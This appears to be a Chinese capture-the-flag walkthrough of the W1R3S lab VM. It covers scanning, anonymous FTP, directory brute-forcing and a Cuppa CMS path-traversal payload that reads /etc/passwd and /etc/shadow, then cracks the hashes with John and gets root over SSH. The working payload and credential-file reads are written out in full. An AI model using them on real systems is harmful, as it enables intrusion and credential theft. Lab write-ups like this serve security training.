- 下载地址
- 安装
- 直接丢到vm中
1、主机发现
sudo nmap -sn 10.200.32.0/24
- 在靶机开启之前,用Nmap扫描一下
- 开启后,在进行扫描
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:00 CST
│Nmap scan report for 10.200.32.2
│Host is up (0.00017s latency).
│MAC Address: 00:50:56:FB:FF:43 (VMware)
│Nmap scan report for 10.200.32.129
│Host is up (0.000063s latency).
│MAC Address: 00:0C:29:4D:89:EC (VMware)
│Nmap scan report for 10.200.32.254
│Host is up (0.00011s latency).
│MAC Address: 00:50:56:E2:B0:10 (VMware)
│Nmap scan report for 10.200.32.128
│Host is up.
│Nmap done: 256 IP addresses (4 hosts up) scanned in 27.90 seconds
2、端口扫描
第一次扫描
sudo nmap --min-rate 10000 -p- 10.200.32.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:08 CST
Nmap scan report for 10.200.32.129
Host is up (0.00029s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)
Nmap done: 1 IP address (1 host up) scanned in 25.39 seconds
- 要求全
- 最少扫两遍,防止网络问题出现波动
第二次扫描
sudo nmap -sT -sV -O -p 21,22,80,3306 10.200.32.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:10 CST
Nmap scan report for 10.200.32.129
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:4D:89:EC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 5.1
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.11 seconds
sudo nmap -sU -p 21,22,80,3306 10.200.32.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:14 CST
Nmap scan report for 10.200.32.129
Host is up (0.00029s latency).
PORT STATE SERVICE
21/udp open|filtered ftp
22/udp open|filtered ssh
80/udp open|filtered http
3306/udp closed mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
- -sT 以TCP形式扫描, -sV扫描端口服务的版本, -O 查看扫描系统
- 用UDP 扫描一下,-sU 以UDP形式扫描一下
- 端口分析:
优先级选择:21,80,3306,22
ftp 简单, 80端口是重点
第三次扫描
使用NMAP的漏洞扫描
sudo nmap --script=vuln -p 21,22,80,3306 10.200.32.129
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /wordpress/wp-login.php: Wordpress login page.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
3306/tcp open mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)
- DOS攻击
- wordpress搭建的东西
每个攻击向量最多不超过20分钟
3、FTP方向
ftp 10.200.32.129
Connected to 10.200.32.129.
220 Welcome to W1R3S.inc FTP service.
Name (10.200.32.129:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
- 使用匿名登录 anonymous
ftp> ls
229 Entering Extended Passive Mode (|||45817|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> cd content
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49057|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 29 Jan 23 2018 01.txt
-rw-r--r-- 1 ftp ftp 165 Jan 23 2018 02.txt
-rw-r--r-- 1 ftp ftp 582 Jan 23 2018 03.txt
226 Directory send OK.
ftp> mget 0*.txt
mget 01.txt [anpqy?]?
229 Entering Extended Passive Mode (|||42914|)
150 Opening BINARY mode data connection for 01.txt (29 bytes).
100% |***********************************************************************************************************************************************************************************************| 29 0.29 KiB/s 00:00 ETA
226 Transfer complete.
29 bytes received in 00:00 (0.29 KiB/s)
mget 02.txt [anpqy?]?
229 Entering Extended Passive Mode (|||47040|)
150 Opening BINARY mode data connection for 02.txt (165 bytes).
100% |***********************************************************************************************************************************************************************************************| 165 9.09 KiB/s 00:00 ETA
226 Transfer complete.
165 bytes received in 00:00 (7.82 KiB/s)
mget 03.txt [anpqy?]?
229 Entering Extended Passive Mode (|||40937|)
150 Opening BINARY mode data connection for 03.txt (582 bytes).
100% |***********************************************************************************************************************************************************************************************| 582 458.35 KiB/s 00:00 ETA
226 Transfer complete.
582 bytes received in 00:00 (294.94 KiB/s)
ftp>cd ..
250 Directory successfully changed.
ftp> cd docs
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||45086|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 138 Jan 23 2018 worktodo.txt
226 Directory send OK.
ftp> get worktodo.txt
local: worktodo.txt remote: worktodo.txt
229 Entering Extended Passive Mode (|||48274|)
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
100% |***********************************************************************************************************************************************************************************************| 138 8.52 KiB/s 00:00 ETA
226 Transfer complete.
138 bytes received in 00:00 (8.14 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||45998|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> cd new-employees
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||40652|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 155 Jan 28 2018 employee-names.txt
226 Directory send OK.
ftp> get employee-names.txt
local: employee-names.txt remote: employee-names.txt
229 Entering Extended Passive Mode (|||48673|)
150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
100% |***********************************************************************************************************************************************************************************************| 155 5.12 KiB/s 00:00 ETAz`
226 Transfer complete.
155 bytes received in 00:00 (5.00 KiB/s)
ftp> binary
200 Switching to Binary mode.
ftp> quit
- 最后执行binary 命令防止文件无法读取
- 发现了五个文件
1.txt,2.txt,3.txt,employee-names.txt,worktodo.txt
分别查看
- 01.txt
cat 01.txt
New FTP Server For W1R3S.inc
- 02.txt
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
-
使用hash-indentifier识别加密方式
(kali㉿kali)-[~] └─$ hash-identifier '01ec2d8fc11c493b25029fb1f47f39ce' Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))第一个可能是MD5,去在线网站md5解密
This is not a password- 第二个:
──(kali㉿kali)-[~] └─$ hash-identifier 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' Not Found. - 感觉像base64编码,试一下
┌──(kali㉿kali)-[~] └─$ echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d It is easy, but not that easy..
正确√
- 第二个:
-
03.txt
└─$ cat 03.txt
. __ __ ______________________ _________ .
_ /| | ____ / \ / / _ ____ \ / / || ____ ____
| | | | _/ __ \ \ // / | || / ( < __ \ | |/ _/ \
| | | Y \ / \ / | || | / / \ | | | \ _
|| || /_ > _/\ / |||| /______ /_______ / /\ ||| /__ >
/ / / / / / / / /无意义
-
employee-names.txt
$ cat employee-names.txt
The W1R3S.inc employee listNaomi.W - Manager Hector.A - IT Dept Joseph.G - Web Design Albert.O - Web Design Gina.L - Inventory Rico.D - Human Resources -
worktodo.txt
cat worktodo.txt
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ-
类似于字符翻转
web :https://www.upsidedowntext.com/
ı don’t thınk thıs ıs the way to root!we have a ןot of work to do‘ stop pןayıng around˙˙˙˙
-
4、web方向
-
查看界面:
http://10.200.32.129/ -
在用nmap做端口扫描的时候,我们发现有wordpress这个cms,尝试从这下手
-
目录爆破
feroxbuster -u http://10.200.32.129 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt- 常用工具:gobuster,dirb、feroxbuster
[####################] - 38s 30000/30000 800/s http://10.200.32.129/javascript/ [####################] - 29s 30000/30000 1065/s http://10.200.32.129/wordpress/ [####################] - 32s 30000/30000 953/s http://10.200.32.129/administrator/ [####################] - 27s 30000/30000 1278/s http://10.200.32.129/javascript/jquery/ [####################] - 30s 30000/30000 1005/s http://10.200.32.129/administrator/templates/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/media/ => Directory listing (add -e to scan) [####################] - 25s 30000/30000 1217/s http://10.200.32.129/administrator/js/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/language/ => Directory listing (add -e to scan) [####################] - 32s 30000/30000 933/s http://10.200.32.129/administrator/components/ [####################] - 26s 30000/30000 1149/s http://10.200.32.129/administrator/installation/ [####################] - 25s 30000/30000 1186/s http://10.200.32.129/administrator/classes/ [####################] - 29s 30000/30000 1081/s http://10.200.32.129/administrator/components/stats/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/classes/ajax/ => Directory listing (add -e to scan) [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/installation/html/ => Directory listing (add -e to scan) [####################] - 25s 30000/30000 1288/s http://10.200.32.129/wordpress/wp-content/ [####################] - 15s 30000/30000 1896/s http://10.200.32.129/wordpress/wp-admin/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/wordpress/wp-includes/ => Directory listing (add -e to scan) [####################] - 29s 30000/30000 1049/s http://10.200.32.129/administrator/templates/default/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/js/jquery/ => Directory listing (add -e to scan) [####################] - 24s 30000/30000 1533/s http://10.200.32.129/wordpress/wp-content/plugins/ [####################] - 28s 30000/30000 1113/s http://10.200.32.129/wordpress/wp-content/themes/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/js/tiny_mce/ => Directory listing (add -e to scan) [####################] - 0s 30000/30000 0/s http://10.200.32.129/wordpress/wp-content/uploads/ => Directory listing (add -e to scan) [####################] - 19s 30000/30000 1697/s http://10.200.32.129/administrator/api/ [####################] - 23s 30000/30000 1287/s http://10.200.32.129/administrator/components/permissions/ ```
- 常用工具:gobuster,dirb、feroxbuster
-
查看 wordpress
404 -
查看 http://10.200.32.129/administrator/installation/
测试过后,发现不行。但是出了一个新的CMS—cuppa
-
使用searchsploit 查看是否存在简单漏洞
searchsploit cuppa cms
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Resul
先下载下来
searchsploit -m 25971.txt
有一个简单的漏洞,测试一下。通过多次测试发现可行。playload如下
http://10.200.32.129/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
但是,没有显示任何东西。查看文档发现,可能存在编码或请求不同的问题
尝试用curl试一下
└─$ sudo curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://10.200.32.129/administrator/alerts/alertConfigField.php | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4414 100 4347 100 67 298k 4706 --:--:-- --:--:-- --:--:-- 307k
Configuration:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/
usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/
var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/
nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/
var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:
/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/
nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time
Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd
Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:
systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:
105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/
syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:
110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:
108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/
nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/
avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-
daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/
bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:
124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:
RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false w1r3s:x:1000:1000:
w1r3s,,,:/home/w1r3s:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/
nologin ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:123:130:MySQL
Server,,,:/nonexistent:/bin/false
发现可以
看看能不能拿到shadow(存储用户密码的文件)
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
存储下来,并用John破解
(www-data)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer (w1r3s)
尝试用ssh连接
sudo ssh w1r3s@10.200.32.129
sudo ssh w1r3s@10.200.32.129
The authenticity of host '10.200.32.129 (10.200.32.129)' can't be established.
ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.200.32.129' (ED25519) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@10.200.32.129's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
102 packages can be updated.
0 updates are security updates.
New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
5、提权
sudo -l
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S:
(ALL : ALL) ALL
发现,我们获得的账户就是root。
w1r3s@W1R3S:~$ sudo -i
sudo: unable to resolve host W1R3S
root@W1R3S:~# ls
flag.txt
root@W1R3S:~# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
-----------------
259
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
